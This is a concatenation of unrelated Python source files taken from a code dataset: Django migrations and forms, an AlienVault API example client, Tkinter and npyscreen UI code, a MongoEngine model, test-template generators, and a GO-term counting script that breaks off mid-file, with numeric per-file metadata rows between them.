class Migration(migrations.Migration):
dependencies = [
('core', '0019_auto_20200923_1942'),
]
operations = [
migrations.AlterField(
model_name='orderitem',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='core.order', verbose_name='pedido'),
),
migrations.AlterField(
model_name='orderitem',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_item', to='core.product', verbose_name='produto'),
),
]
| 30.76 | 151 | 0.642393 | 87 | 769 | 5.54023 | 0.494253 | 0.06639 | 0.087137 | 0.136929 | 0.460581 | 0.460581 | 0.286307 | 0.286307 | 0.286307 | 0.286307 | 0 | 0.052277 | 0.228869 | 769 | 24 | 152 | 32.041667 | 0.76054 | 0.058518 | 0 | 0.333333 | 1 | 0 | 0.148199 | 0.031856 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e536b2f665710fad652d1507cbb967f6b032a2 | 1,989 | py | Python | framework.py | w1rtp/USMAnywhereAPI | d239fde894e085cfe5350800225ebe88297f922f | [
"MIT"
] | 3 | 2019-02-04T18:15:00.000Z | 2021-06-22T21:03:22.000Z | framework.py | w1rtp/USMAnywhereAPI | d239fde894e085cfe5350800225ebe88297f922f | [
"MIT"
] | 1 | 2018-10-04T21:51:50.000Z | 2018-10-06T18:17:00.000Z | framework.py | w1rtp/USMAnywhereAPI | d239fde894e085cfe5350800225ebe88297f922f | [
"MIT"
] | 2 | 2019-12-23T16:03:01.000Z | 2022-03-17T01:13:17.000Z | #!/usr/bin/env python
"""
Nicholas' Example API code for interacting with Alienvault API.
This is just Example code written by NMA.IO.
There isn't really much you can do with the API just yet, so
this will be a work in progress.
Grab your API key here:
https://www.alienvault.com/documentation/usm-anywhere/api/alienvault-api.htm?cshid=1182
That said, you could use this to write an alerter bot.
* Note, this isn't an SDK, just some example code to get people started...
"""
# import json # uncomment if you want pretty printing.
import base64
import requests
URL = "alienvault.cloud/api/2.0"
HOST = "" # put your subdomain here.
def Auth(apiuser, apikey):
"""Our Authentication Code.
    :param apiuser: API username
    :param apikey: API key
    :returns: oauth_token
"""
headers = {"Authorization": "Basic {}".format(base64.b64encode("%s:%s" % (apiuser, apikey)))}
r = requests.post("https://{}.{}/oauth/token?grant_type=client_credentials".format(HOST, URL), headers=headers)
    if r.status_code == 200:  # 'is' compares identity, not value
return r.json()["access_token"]
else:
print("Authentication failed. Check username/Password")
exit(1)
def Alarms(token):
"""Pull Alarms from the API Console."""
headers = {"Authorization": "Bearer {}".format(token)}
r = requests.get("https://{}.{}/alarms/?page=1&size=20&suppressed=false&status=open".format(HOST, URL), headers=headers)
    if r.status_code != 200:
print("Something went wrong. \n{}".format(r.content))
exit(1)
else: return (r.json())
def Events():
"""Nothing yet."""
pass
if __name__ == "__main__":
print("Simple API Integration with Alienvault USM Anywhere - 2018 NMA.IO")
token = Auth("username", "password")
jdata = Alarms(token)
for item in jdata["_embedded"]["alarms"]:
# print(json.dumps(item, indent=2)) # uncomment if you want a pretty version of the whole block.
print(item["rule_method"] + ": " + " ".join(item["alarm_sources"]))
| 31.078125 | 124 | 0.667672 | 278 | 1,989 | 4.715827 | 0.55036 | 0.021358 | 0.021358 | 0.02746 | 0.064073 | 0.064073 | 0.064073 | 0.064073 | 0.064073 | 0.064073 | 0 | 0.01737 | 0.189542 | 1,989 | 63 | 125 | 31.571429 | 0.795906 | 0.388135 | 0 | 0.074074 | 0 | 0 | 0.347566 | 0.020495 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.111111 | 0.074074 | 0 | 0.222222 | 0.148148 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
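One portability caveat in the `Auth` header built above: under Python 3, `base64.b64encode` takes and returns bytes, so a port would encode and decode explicitly. A hedged sketch (credentials are placeholders):
import base64

def basic_auth_header(apiuser, apikey):
    # Python 3-safe construction of the same Basic-auth header
    token = base64.b64encode("{}:{}".format(apiuser, apikey).encode("utf-8")).decode("ascii")
    return {"Authorization": "Basic {}".format(token)}

print(basic_auth_header("username", "apikey"))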
69e81c899520bdfc0aa12c011c27b56eb5e31e55 | 2,477 | py | Python | gen_files.py | qbosen/leetcode_file_generator | 594d7bb1e5ac5cb3100ddbaecc3f8359c17dbbb8 | [
"MIT"
] | null | null | null | gen_files.py | qbosen/leetcode_file_generator | 594d7bb1e5ac5cb3100ddbaecc3f8359c17dbbb8 | [
"MIT"
] | null | null | null | gen_files.py | qbosen/leetcode_file_generator | 594d7bb1e5ac5cb3100ddbaecc3f8359c17dbbb8 | [
"MIT"
] | null | null | null | # coding=utf-8
# /usr/bin/python gen_files.py 100
import os
import sys
import time
from settings import *
from settings_advanced import *
try:
import cPickle as pickle
except ImportError:
import pickle
from content_parser import DescriptionParser
from content_parser_advance import AdvancedDescriptionParser
def main():
num = sys.argv[1] if len(sys.argv) > 1 else '11'
level = sys.argv[2] if len(sys.argv) > 2 else None
level = int(level) if level else default_format
if not num:
return
info = get_info(num)
package_path = make_dir(info)
en_level = get_level(info)
date = time.strftime('%Y/%m/%d', time.localtime())
if not enable_advance:
dp = DescriptionParser().parse(info['path'])
md = md_pattern.format(title=dp.title, content=dp.content, date=date, **info)
solution = class_pattern.format(en_level=en_level, author=author, date=date, **info)
test = test_class_pattern.format(en_level=en_level, author=author, date=date, **info)
else:
dp = AdvancedDescriptionParser().parse(info['path'], level)
dp_data = dp.data
# print dp_data
md = ad_md_pattern.format(date=date, **dp_data)
solution = ad_class_pattern.format(en_level=en_level, author=author, date=date, **dp_data)
test = ad_test_class_pattern.format(en_level=en_level, author=author, date=date, **dp_data)
generate_file(package_path, 'README.md', md)
file_suffix = language_map[language] if language in language_map else '.java'
generate_file(package_path, 'Solution%s' % file_suffix, solution)
generate_file(package_path, 'SolutionTest%s' % file_suffix, test)
def get_info(num):
dic = pickle.load(open('dumps.txt', 'r'))
return dic[num] if num in dic else {}
def generate_file(base_path, file_name, content):
full_path = os.path.join(base_path, file_name)
with open(full_path, 'w') as f:
f.write(content.encode('utf-8'))
print 'create file: %s' % full_path
def get_level(info_dict):
ch_level = info_dict['level']
    level_map = {'简单': 'easy', '中等': 'medium', '困难': 'hard'}  # keys are the Chinese difficulty labels (easy/medium/hard)
return level_map[ch_level] if ch_level in level_map else 'default'
def make_dir(info_dict):
level = get_level(info_dict)
base_path = os.path.join(src_path, level, 'q{:0>3s}'.format(info_dict['index']))
if not os.path.exists(base_path):
os.makedirs(base_path)
return base_path
if __name__ == '__main__':
main()
| 31.75641 | 99 | 0.686314 | 370 | 2,477 | 4.37027 | 0.302703 | 0.038961 | 0.044527 | 0.049474 | 0.145949 | 0.145949 | 0.145949 | 0.145949 | 0.145949 | 0.145949 | 0 | 0.006471 | 0.188938 | 2,477 | 77 | 100 | 32.168831 | 0.798407 | 0.023819 | 0 | 0 | 0 | 0 | 0.057995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.178571 | null | null | 0.017857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
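For reference, a tiny standalone sketch of the directory naming that make_dir above produces; the sample values are invented.
import os

info = {'index': '7'}
level = 'easy'  # what get_level would return for a '简单' problem
print(os.path.join('src', level, 'q{:0>3s}'.format(info['index'])))  # -> src/easy/q007 (POSIX)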
69e933da38595f381a40d626b00d56311127794d | 1,287 | py | Python | interface/exemplos1/05.py | ell3a/estudos-python | 09808a462aa3e73ad433501acb11f62217548af8 | [
"MIT"
] | null | null | null | interface/exemplos1/05.py | ell3a/estudos-python | 09808a462aa3e73ad433501acb11f62217548af8 | [
"MIT"
] | null | null | null | interface/exemplos1/05.py | ell3a/estudos-python | 09808a462aa3e73ad433501acb11f62217548af8 | [
"MIT"
] | null | null | null | from tkinter import *
from tkinter import filedialog  # Python 3 module name; tkFileDialog was the Python 2 name
root = Tk()
menubar = Menu(root)
root.config(menu=menubar)
root.title('Tk Menu')
root.geometry('150x150')
filemenu = Menu(menubar)
filemenu2 = Menu(menubar)
filemenu3 = Menu(menubar)
menubar.add_cascade(label='Arquivo', menu=filemenu)   # "File"
menubar.add_cascade(label='Cores', menu=filemenu2)    # "Colors"
menubar.add_cascade(label='Ajuda', menu=filemenu3)    # "Help"
def Open(): filedialog.askopenfilename()
def Save(): filedialog.asksaveasfilename()
def Quit(): root.destroy()
def ColorBlue(): Text(background='blue').pack()
def ColorRed(): Text(background='red').pack()
def ColorBlack(): Text(background='black').pack()
def Help():
text = Text(root)
    text.pack()
    # the inserted text says: "When you click the button of the respective
    # color, the screen background will appear in the chosen color."
    text.insert('insert', 'Ao clicar no botão da\n'
'respectiva cor, o fundo da tela\n'
'aparecerá na cor escolhida.')
filemenu.add_command(label='Abrir...', command=Open)
filemenu.add_command(label='Salvar como...', command=Save)
filemenu.add_separator()
filemenu.add_command(label='Sair', command=Quit)
filemenu2.add_command(label='Azul', command=ColorBlue)
filemenu2.add_command(label='Vermelho', command=ColorRed)
filemenu2.add_command(label='Preto', command=ColorBlack)
filemenu3.add_command(label='Ajuda', command=Help)
root.mainloop() | 33 | 61 | 0.724165 | 163 | 1,287 | 5.650307 | 0.386503 | 0.076004 | 0.114007 | 0.071661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012378 | 0.121212 | 1,287 | 39 | 62 | 33 | 0.801945 | 0 | 0 | 0 | 0 | 0 | 0.139752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0 | 0.058824 | 0 | 0.264706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69e9b7f3b724fc8a84cb33e494ceb8bad87452a5 | 349 | py | Python | public/models.py | level09/yooo | deb8fbdd2d2114a9189e35ee5ab6014876f99438 | [
"MIT"
] | 6 | 2015-02-20T17:24:46.000Z | 2020-05-21T18:23:25.000Z | public/models.py | level09/yooo | deb8fbdd2d2114a9189e35ee5ab6014876f99438 | [
"MIT"
] | null | null | null | public/models.py | level09/yooo | deb8fbdd2d2114a9189e35ee5ab6014876f99438 | [
"MIT"
] | null | null | null | from extensions import db
import datetime
import json
class Link(db.Document):
lid = db.SequenceField(unique=True)
longUrl = db.StringField()
shortUrl = db.StringField()
date_submitted = db.DateTimeField(default=datetime.datetime.now)
usage = db.IntField(default=0)
def __unicode__(self):
return '%s' % self.longUrl | 26.846154 | 68 | 0.710602 | 43 | 349 | 5.651163 | 0.674419 | 0.106996 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003509 | 0.183381 | 349 | 13 | 69 | 26.846154 | 0.849123 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0.090909 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
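A hedged usage sketch for the Link document above; it assumes a reachable MongoDB instance, and the database name below is invented.
from mongoengine import connect

connect('shortener_demo')                         # database name is an assumption
link = Link(longUrl='https://example.com/page', shortUrl='abc')
link.save()                                       # lid is filled in by the SequenceField
link.usage += 1                                   # count one redirect
link.save()
print(link.lid, link.shortUrl, link.usage)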
69ea5b5cea2f3bde949a1ce25fc96a75ca9f7638 | 6,132 | py | Python | script/python/lib/exhaust_generation/exhaustive_tpls.py | timblechmann/nt2 | 6c71f7063ca4e5975c9c019877e6b2fe07c9e4ce | [
"BSL-1.0"
] | 2 | 2016-09-14T00:23:53.000Z | 2018-01-14T12:51:18.000Z | script/python/lib/exhaust_generation/exhaustive_tpls.py | timblechmann/nt2 | 6c71f7063ca4e5975c9c019877e6b2fe07c9e4ce | [
"BSL-1.0"
] | null | null | null | script/python/lib/exhaust_generation/exhaustive_tpls.py | timblechmann/nt2 | 6c71f7063ca4e5975c9c019877e6b2fe07c9e4ce | [
"BSL-1.0"
] | null | null | null | #! /usr/bin/env python
# -*- coding: iso-8859-15 -*-
##############################################################################
# Copyright 2003 & onward LASMEA UMR 6602 CNRS/Univ. Clermont II
# Copyright 2009 & onward LRI UMR 8623 CNRS/Univ Paris Sud XI
#
# Distributed under the Boost Software License, Version 1.0
# See accompanying file LICENSE.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt
##############################################################################
"""generation of an exhaustive test unit
"""
__author__ = "Lapreste Jean-thierry (lapreste@univ-bpclermont.fr)"
__version__ = "$Revision: 1.0 $"
__date__ = "$Date: 2011 $"
__copyright__ = "Lapreste Jean-thierry"
__license__ = "Boost Software License, Version 1.0"
class Exhaustive_data(object) :
Tpl = {
'scalar' : {
},
'simd' : {
'global_header_txt' : '\n'.join([
'////////////////////////////////////////////////////////////////////////',
'// exhaustive test in simd mode for functor $prefix$::$name$',
'////////////////////////////////////////////////////////////////////////',
'#include <nt2/include/functions/$name$.hpp>',
'',
'#include <nt2/include/functions/iround.hpp>',
'#include <nt2/include/functions/load.hpp>',
'#include <nt2/include/functions/min.hpp>',
'#include <nt2/include/functions/splat.hpp>',
'#include <nt2/include/functions/successor.hpp>',
'#include <nt2/include/functions/ulpdist.hpp>',
'',
'#include <nt2/include/constants/real.hpp>',
'',
'#include <nt2/sdk/meta/cardinal_of.hpp>',
'#include <nt2/sdk/meta/as_integer.hpp>',
'',
'#include <iostream>',
'',
'typedef BOOST_SIMD_DEFAULT_EXTENSION ext_t;',
]),
'typ_repfunc_txt' : '\n'.join([
'static inline ',
'typename nt2::meta::call<nt2::tag::$name$_($typ$)>::type',
'repfunc(const $typ$ & a0)',
'{',
' return $repfunc$;',
'}',
]),
'test_func_forwarding_txt' : '\n'.join([
'template <class T>',
'void exhaust_test_$name$(const T& mini,const T& maxi);'
]),
'test_func_call_txt' : '\n'.join([
' exhaust_test_$name$($mini$,$maxi$);'
]),
'main_beg_txt' : '\n'.join([
'int main(){',
'{',
]),
'main_end_txt' : '\n'.join([
' return 0;',
'}',
'',
]),
'test_func_typ_txt' : '\n'.join([
'template <>',
'void exhaust_test_$name$<$typ$>(const $typ$& mini,const $typ$& maxi)',
' {',
' typedef boost::simd::native<$typ$,ext_t> n_t;',
' typedef typename nt2::meta::as_integer<n_t>::type in_t;',
            '  typedef typename nt2::meta::call<nt2::tag::$name$_($typ$)>::type sr_t;',
            '  typedef typename nt2::meta::call<nt2::tag::$name$_(n_t)>::type r_t;',
' const nt2::uint32_t N = nt2::meta::cardinal_of<n_t>::value;',
' const in_t vN = nt2::splat<in_t>(N);',
' const nt2::uint32_t M = 10;',
' nt2::uint32_t histo[M+1];',
' for(nt2::uint32_t i = 0; i < M; i++) histo[i] = 0;',
' float a[N];',
' a[0] = mini;',
' for(nt2::uint32_t i = 1; i < N; i++)',
' a[i] = nt2::successor(a[i-1], 1);',
' n_t a0 = nt2::load<n_t>(&a[0],0);',
' nt2::uint32_t k = 0,j = 0;',
' std::cout << "a line of points to wait for... be patient!" << std::endl;',
' for(; a0[N-1] < maxi; a0 = nt2::successor(a0, vN))',
' {',
' n_t z = nt2::$name$(a0);',
' for(nt2::uint32_t i = 0; i < N; i++)',
' {',
' float v = repfunc(a0[i]);',
' float sz = z[i];',
' ++histo[nt2::min(M, nt2::iround(2*nt2::ulpdist(v, sz)))];',
' ++k;',
' if (k%100000000 == 0){',
' std::cout << "." << std::flush; ++j;',
' if (j == 80){std::cout << std::endl; j = 0;}',
' }',
' }',
' }',
' std::cout << "exhaustive test for " << std::endl;',
' std::cout << " nt2::$name$ versus $repfunc$ " << std::endl;',
' std::cout << " in $mode$ mode and $typ$ type" << std::endl;',
' for(nt2::uint32_t i = 0; i < M; i++)',
' std::cout << i/2.0 << " -> " << histo[i] << std::endl;',
' std::cout << k << " values computed" << std::endl;',
' std::cout << std::endl;',
' std::cout << std::endl;',
' for(nt2::uint32_t i = 0; i < M; i++)',
' std::cout << i/2.0 << " -> "',
' << (histo[i]*100.0/k) << "%" << std::endl;',
' }',
'',
]),
}
}
def __init__(self) :
self.tpl = Exhaustive_data.Tpl
if __name__ == "__main__" :
print __doc__
from pprint import PrettyPrinter
PrettyPrinter().pprint(Exhaustive_data.Tpl)
PrettyPrinter().pprint(Exhaustive_data().tpl)
| 46.105263 | 95 | 0.379485 | 581 | 6,132 | 3.836489 | 0.280551 | 0.034545 | 0.05249 | 0.081651 | 0.288022 | 0.143114 | 0.104531 | 0.097353 | 0.097353 | 0.036788 | 0 | 0.036976 | 0.404599 | 6,132 | 132 | 96 | 46.454545 | 0.573542 | 0.061481 | 0 | 0.267241 | 0 | 0.068966 | 0.559221 | 0.172526 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.008621 | null | null | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
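The $key$ placeholders in the templates above are presumably substituted elsewhere in the generator; a minimal sketch of that step (the plain str.replace approach is an assumption):
tpl = Exhaustive_data().tpl['simd']['test_func_call_txt']
for key, val in {'name': 'sqrt', 'mini': '0.0f', 'maxi': '100.0f'}.items():
    tpl = tpl.replace('$' + key + '$', val)
print(tpl)  # ->   exhaust_test_sqrt(0.0f,100.0f);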
69ede5a7a5d5e261a9c1ba0ddb8dc8c9e3cbfadd | 1,224 | py | Python | account/forms.py | hhdMrLion/crm_api | 66df068821be36a17c3b0e0e9660b7f8408fa1bd | [
"Apache-2.0"
] | 1 | 2021-06-18T03:03:38.000Z | 2021-06-18T03:03:38.000Z | account/forms.py | hhdMrLion/crm_api | 66df068821be36a17c3b0e0e9660b7f8408fa1bd | [
"Apache-2.0"
] | null | null | null | account/forms.py | hhdMrLion/crm_api | 66df068821be36a17c3b0e0e9660b7f8408fa1bd | [
"Apache-2.0"
] | null | null | null | from django import forms
from django.contrib.auth import authenticate, login
from django.utils.timezone import now
class LoginForm(forms.Form):
""" 登录表单 """
    username = forms.CharField(label='用户名', max_length=100, required=False, initial='admin')  # label: "Username"
    password = forms.CharField(label='密码', max_length=200, min_length=6, widget=forms.PasswordInput)  # label: "Password"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.username = None
def clean(self):
data = super(LoginForm, self).clean()
        # figure out which user this is
print(data)
if self.errors:
return
username = data.get('username', None)
password = data.get('password', None)
user = authenticate(username=username, password=password)
if user is None:
            raise forms.ValidationError('用户名或者是密码不正确')  # "incorrect username or password"
else:
if not user.is_active:
                raise forms.ValidationError('该用户已被禁用')  # "this user has been disabled"
self.user = user
return data
def do_login(self, request):
        # perform the user login
user = self.user
login(request, user)
user.last_login = now()
user.save()
return user
| 30.6 | 101 | 0.591503 | 134 | 1,224 | 5.298507 | 0.462687 | 0.042254 | 0.053521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008187 | 0.301471 | 1,224 | 39 | 102 | 31.384615 | 0.822222 | 0.017974 | 0 | 0 | 0 | 0 | 0.038095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0.1 | 0 | 0.4 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
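A hedged sketch of a view driving the form above; the URL name and template path are invented.
from django.shortcuts import redirect, render

def login_view(request):
    form = LoginForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        form.do_login(request)           # authenticates and logs the user in
        return redirect('home')          # 'home' is an assumed URL name
    return render(request, 'login.html', {'form': form})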
69ef030a305db0390a90f17929cad93e52de6059 | 2,090 | py | Python | welly/__init__.py | agilescientific/welly | 1ced65d6e7d48642112e72ec8b412687e5a910db | [
"Apache-2.0"
] | 3 | 2022-03-17T08:42:25.000Z | 2022-03-23T08:26:13.000Z | welly/__init__.py | agilescientific/welly | 1ced65d6e7d48642112e72ec8b412687e5a910db | [
"Apache-2.0"
] | 3 | 2022-03-08T13:01:14.000Z | 2022-03-21T09:42:09.000Z | welly/__init__.py | agilescientific/welly | 1ced65d6e7d48642112e72ec8b412687e5a910db | [
"Apache-2.0"
] | 1 | 2022-03-16T03:51:39.000Z | 2022-03-16T03:51:39.000Z | """
==================
welly
==================
"""
from .project import Project
from .well import Well
from .header import Header
from .curve import Curve
from .synthetic import Synthetic
from .location import Location
from .crs import CRS
from . import tools
from . import quality
def read_las(path, **kwargs):
"""
A package namespace method to be called as `welly.read_las`.
Just wraps `Project.from_las()`. Creates a `Project` from a .LAS file.
Args:
path (str): path or URL where LAS is located. `*.las` to load all files
in dir
        **kwargs (): See `Project.from_las()` for additional arguments
Returns:
welly.Project. The Project object.
"""
return Project.from_las(path, **kwargs)
def read_df(df, **kwargs):
"""
A package namespace method to be called as `welly.read_df`.
Just wraps `Well.from_df()`. Creates a `Well` from your pd.DataFrame.
Args:
df (pd.DataFrame): Column data and column names
Optional **kwargs:
units (dict): Optional. Units of measurement of the curves in `df`.
req (list): Optional. An alias list, giving all required curves.
uwi (str): Unique Well Identifier (UWI)
name (str): Name
Returns:
Well. The `Well` object.
"""
return Well.from_df(df, **kwargs)
__all__ = [
'Project',
'Well',
'Header',
'Curve',
'Synthetic',
'Location',
'CRS',
'quality',
'tools', # Various classes in here
    'read_las',
    'read_df'
]
from pkg_resources import get_distribution, DistributionNotFound
try:
VERSION = get_distribution(__name__).version
except DistributionNotFound:
try:
from ._version import version as VERSION
except ImportError:
raise ImportError(
"Failed to find (autogenerated) _version.py. "
"This might be because you are installing from GitHub's tarballs, "
"use the PyPI ones."
)
__version__ = VERSION
| 25.180723 | 79 | 0.596651 | 245 | 2,090 | 4.979592 | 0.416327 | 0.045082 | 0.034426 | 0.037705 | 0.081967 | 0.081967 | 0.081967 | 0.081967 | 0.081967 | 0.081967 | 0 | 0 | 0.292345 | 2,090 | 82 | 80 | 25.487805 | 0.824882 | 0.426794 | 0 | 0.052632 | 0 | 0 | 0.173077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.342105 | 0 | 0.447368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
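Typical usage of the two namespace helpers above might look as follows; the LAS path, curve name and values are placeholders.
import pandas as pd
import welly

project = welly.read_las('data/my_well.las')                     # wraps Project.from_las()
well = welly.read_df(pd.DataFrame({'GR': [85.0, 90.2]}), name='demo well')
print(len(project), well)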
69f45cc29efc997451ff86c0a0f571e78b3958e7 | 125 | py | Python | tridu_py3.py | YuriSerrano/URI-1933 | 58fdc5e90293ef55afacb164b955551a72a81d78 | [
"MIT"
] | null | null | null | tridu_py3.py | YuriSerrano/URI-1933 | 58fdc5e90293ef55afacb164b955551a72a81d78 | [
"MIT"
] | null | null | null | tridu_py3.py | YuriSerrano/URI-1933 | 58fdc5e90293ef55afacb164b955551a72a81d78 | [
"MIT"
] | null | null | null | import sys
'''
Created by Yuri Serrano
'''
a,b = input().split()
a = int(a)
b = int(b)
if b > a:
print(b)
else:
print(a) | 8.928571 | 23 | 0.568 | 24 | 125 | 2.958333 | 0.583333 | 0.056338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224 | 125 | 14 | 24 | 8.928571 | 0.731959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69f9c87dea73354181eadb4afd02ba8d68d76483 | 1,168 | py | Python | piptui/custom/apNPSApplicationEvents.py | UltraStudioLTD/PipTUI | 62f5707faa004ba6d330288656ba192f37516921 | [
"MIT"
] | 33 | 2019-07-11T13:19:29.000Z | 2022-02-23T12:42:22.000Z | piptui/custom/apNPSApplicationEvents.py | UltraStudioLTD/PipTUI | 62f5707faa004ba6d330288656ba192f37516921 | [
"MIT"
] | 6 | 2019-07-20T21:21:51.000Z | 2021-09-24T16:24:34.000Z | piptui/custom/apNPSApplicationEvents.py | UltraStudioLTD/PipTUI | 62f5707faa004ba6d330288656ba192f37516921 | [
"MIT"
] | 8 | 2019-07-21T07:38:08.000Z | 2021-11-11T13:30:45.000Z | import collections
from npyscreen import StandardApp, apNPSApplicationEvents
class PipTuiEvents(object):
def __init__(self):
        self.internal_queue = collections.deque()
        super(PipTuiEvents, self).__init__()
def get(self, maximum=None):
if maximum is None:
maximum = -1
counter = 1
while counter != maximum:
try:
                yield self.internal_queue.pop()
except IndexError:
pass
counter += 1
class PipTuiApp(StandardApp):
def __init__(self):
        super(PipTuiApp, self).__init__()  # name the subclass, or StandardApp.__init__ is skipped
self.event_directory = {}
self.event_queues = {}
self.initalize_application_event_queues()
self.initialize_event_handling()
def process_event_queues(self, max_events_per_queue=None):
for queue in self.event_queues.values():
try:
for event in queue.get(maximum=max_events_per_queue):
try:
self.process_event(event)
except StopIteration:
pass
except RuntimeError:
pass
| 28.487805 | 69 | 0.576199 | 112 | 1,168 | 5.696429 | 0.419643 | 0.068966 | 0.070533 | 0.053292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003958 | 0.351027 | 1,168 | 40 | 70 | 29.2 | 0.837731 | 0 | 0 | 0.242424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0.090909 | 0.060606 | 0 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
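A small sketch of the bounded drain that PipTuiEvents.get implements, standalone and using only the class above; note that a call with maximum=N yields at most N-1 queued events.
q = PipTuiEvents()
for evt in ('redraw', 'keypress', 'resize'):
    q.internal_queue.appendleft(evt)       # oldest events end up on the right
for event in q.get(maximum=3):             # drains at most two events here
    print(event)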
0e0038faf589bc3f8391d7469e67376d79fd62bf | 1,656 | py | Python | scripts/conteo_go.py | Carlosriosch/BrucellaMelitensis | 4f16755fbb3e3ba33010d1e0d9fa68803b377075 | [
"MIT"
] | null | null | null | scripts/conteo_go.py | Carlosriosch/BrucellaMelitensis | 4f16755fbb3e3ba33010d1e0d9fa68803b377075 | [
"MIT"
] | null | null | null | scripts/conteo_go.py | Carlosriosch/BrucellaMelitensis | 4f16755fbb3e3ba33010d1e0d9fa68803b377075 | [
"MIT"
] | null | null | null | from __future__ import division
from collections import Counter
import numpy as np
import glob
path_input = "../GO_analysis_PPI_Brucella/2.GO_crudos_y_ancestors/"
path_output = "../GO_analysis_PPI_Brucella/3.GO_proporciones/"
files = glob.glob(path_input + "*CON_GEN_ID_ancestors*.txt")
for f in files:
    # this label will be used to name the output txt files.
    # note that the 0.2 suffix it used to have was dropped; the naming scheme should be simplified anyway
etiqueta = f.split('.', -1)[-2]
    # load a file and count how many occurrences of each term it has
data = np.loadtxt(f, dtype = 'str', delimiter = '\n')
    # data is a list whose entries each hold several GO terms. Split every entry and flatten everything into a single list.
lista = []
sublista = []
for d in data:
sublista.append(d.split())
for s in sublista:
for ss in s:
lista.append(ss)
    # now count the occurrences of each term: a dictionary mapping each GO term to its occurrence count
cuentas = Counter(lista)
    # to express the proportion, compute the total number of elements
size = len(lista)
proporciones = {}
for c in cuentas:
        proporciones[c] = cuentas[c]  # note: stores raw counts; dividing by size would give true proportions
#print(c, cuentas[c])
    # sort
proporciones = sorted(proporciones.items(), key=lambda kv: kv[1])
